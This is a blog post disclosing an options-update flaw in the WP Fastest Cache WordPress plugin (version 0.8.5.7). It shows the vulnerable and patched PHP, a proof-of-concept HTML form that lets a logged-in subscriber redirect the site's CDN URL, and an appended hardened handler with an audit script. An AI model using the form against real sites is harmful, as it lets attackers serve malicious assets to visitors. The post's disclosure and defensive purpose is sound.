Protecting You Against Wordfence’s Bad Practices: Unauthorized Options Update Vulnerability in WP Fastest Cache
Wordfence is putting WordPress websites at risk by disclosing vulnerabilities in plugins while leaving out the critical details needed to double check their work, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities and try to limit the damage Wordfence’s practice could cause.
Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Options Update vulnerability allows an attacker to access and make changes to the CDN (Content Delivery Network) options for the website. With this control an attacker can direct all requests for css files, images, videos, etc. to their site, allowing them to serve malicious content to visitors of the vulnerable site.”
The relevant change in the next version was to restrict the AJAX accessible function wpfc_save_cdn_integration_ajax_request_callback() in the file /wpFastestCache.php to Administrator level users.
Code in 0.8.5.7:
public function wpfc_save_cdn_integration_ajax_request_callback(){
	$values = json_encode($_POST["values"]);

	if(get_option("WpFastestCacheCDN")){
		update_option("WpFastestCacheCDN", $values);
	}else{
		add_option("WpFastestCacheCDN", $values, null, "yes");
	}

	echo json_encode(array("success" => true));
	exit;
}
Code in 0.8.5.8:
public function wpfc_save_cdn_integration_ajax_request_callback(){
	if(current_user_can('manage_options')){
		$values = json_encode($_POST["values"]);

		if(get_option("WpFastestCacheCDN")){
			update_option("WpFastestCacheCDN", $values);
		}else{
			add_option("WpFastestCacheCDN", $values, null, "yes");
		}

		echo json_encode(array("success" => true));
		exit;
	}else{
		wp_die("Must be admin");
	}
}
Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which substantially limits the severity of the vulnerability.
Proof of Concept
The following proof of concept will set the CDN URL to example.com.
Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" />
<input type="hidden" name="values[success]" value="false" />
<input type="hidden" name="values[id]" value="other" />
<input type="hidden" name="values[cdnurl]" value="example.com" />
<input type="hidden" name="values[originurl]" value="" />
<input type="hidden" name="values[file_types]" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
<input type="hidden" name="file_types" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
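The following is an added example, not code from WP Fastest Cache or from this post, covering both the fix shown above and the proof of concept. Part 1 is what a hardened version of the CDN-save AJAX handler looks like: the capability check that 0.8.5.8 adds, plus a nonce check and validation of the submitted CDN host against an allowlist, with the action registered only for logged-in users. Part 2 is the check a site owner would run after reading the proof of concept: decode the stored WpFastestCacheCDN option and report whether its cdnurl still points at a host they control. The hook name, nonce action name, allowlist and the sample option value are assumptions made for the example; the WordPress functions used (current_user_can, check_ajax_referer, wp_send_json_error, update_option, wp_json_encode) are real core functions.

```php
<?php
// Added example (not the plugin's code). Part 1 is a hardened version of the
// CDN-save AJAX handler; part 2 audits the stored option. The hook name,
// nonce action, allowlist and sample values are assumptions for this example.

// Hosts a CDN URL may point at (assumed; replace with the site's real CDN hosts).
const WPFC_EXAMPLE_ALLOWED_CDN_HOSTS = array('cdn.example.org', 'static.example.org');

// Lower-cased host of a CDN URL, or '' when none can be extracted. A bare host
// such as "example.com" (what the proof of concept submits) is given a scheme
// first so parse_url() reports a host rather than a path.
function wpfc_example_cdn_host($cdnurl) {
    $cdnurl = trim((string) $cdnurl);
    if ($cdnurl === '') {
        return '';
    }
    if (strpos($cdnurl, '://') === false) {
        $cdnurl = 'https://' . ltrim($cdnurl, '/');
    }
    $host = parse_url($cdnurl, PHP_URL_HOST);
    return is_string($host) ? strtolower($host) : '';
}

// Part 1: hardened handler. Registering only wp_ajax_ (not wp_ajax_nopriv_)
// means WordPress refuses unauthenticated callers before the callback runs.
if (function_exists('add_action')) {
    add_action('wp_ajax_wpfc_example_save_cdn', 'wpfc_example_save_cdn_callback');
}

function wpfc_example_save_cdn_callback() {
    // Capability gate: this is the check 0.8.5.8 adds, so a subscriber-level
    // account can no longer reach the option write.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Must be admin'), 403);
    }
    // Nonce check (assumed action name): the request has to come from a form
    // or script WordPress generated for this administrator.
    check_ajax_referer('wpfc_example_cdn_nonce', 'nonce');

    // Accept only the fields the handler needs instead of serialising the
    // whole $_POST['values'] array into the option.
    $raw  = (isset($_POST['values']) && is_array($_POST['values'])) ? wp_unslash($_POST['values']) : array();
    $host = wpfc_example_cdn_host(isset($raw['cdnurl']) ? $raw['cdnurl'] : '');
    if (!in_array($host, WPFC_EXAMPLE_ALLOWED_CDN_HOSTS, true)) {
        wp_send_json_error(array('message' => 'CDN URL host is not allowed'), 400);
    }
    $values = array(
        'id'         => sanitize_key(isset($raw['id']) ? $raw['id'] : 'other'),
        'cdnurl'     => 'https://' . $host,
        'originurl'  => esc_url_raw(isset($raw['originurl']) ? $raw['originurl'] : ''),
        'file_types' => sanitize_text_field(isset($raw['file_types']) ? $raw['file_types'] : ''),
    );
    // update_option() creates a missing option, so the get_option()/add_option()
    // branch in the original is not needed.
    update_option('WpFastestCacheCDN', wp_json_encode($values));
    wp_send_json_success();
}

// Part 2: audit. Returns whether the stored option decodes and whether its
// cdnurl host is on the allowlist, so a site owner can spot a redirected CDN.
function wpfc_example_audit_cdn_option($option_json, array $allowed_hosts) {
    $decoded = json_decode((string) $option_json, true);
    if (!is_array($decoded)) {
        return array('ok' => false, 'host' => '', 'reason' => 'option empty or not valid JSON');
    }
    $host = wpfc_example_cdn_host(isset($decoded['cdnurl']) ? $decoded['cdnurl'] : '');
    if ($host === '') {
        return array('ok' => false, 'host' => '', 'reason' => 'no usable cdnurl in option');
    }
    $ok = in_array($host, array_map('strtolower', $allowed_hosts), true);
    return array('ok' => $ok, 'host' => $host,
                 'reason' => $ok ? 'cdnurl host is allowlisted' : 'cdnurl host is NOT allowlisted');
}

// Inside WordPress (e.g. run with `wp eval-file`) read the live option; under
// plain `php` fall back to a constructed value shaped like the proof of concept's.
$option = function_exists('get_option')
    ? get_option('WpFastestCacheCDN')
    : json_encode(array('success' => 'false', 'id' => 'other', 'cdnurl' => 'example.com',
                        'originurl' => '', 'file_types' => 'css,js,gif,png'));
$report = wpfc_example_audit_cdn_option($option, WPFC_EXAMPLE_ALLOWED_CDN_HOSTS);
printf("cdn host=%s trusted=%s (%s)\n", $report['host'], $report['ok'] ? 'yes' : 'no', $report['reason']);
```

Run with plain `php` the script reports the constructed value (host example.com, not trusted); run inside WordPress it reports the live option instead. The handler stores only a normalised host under a fixed scheme rather than whatever string was posted, which is what makes the audit's comparison meaningful; the fix on this page only adds the capability gate, and whether the plugin checks a nonce elsewhere is not shown here.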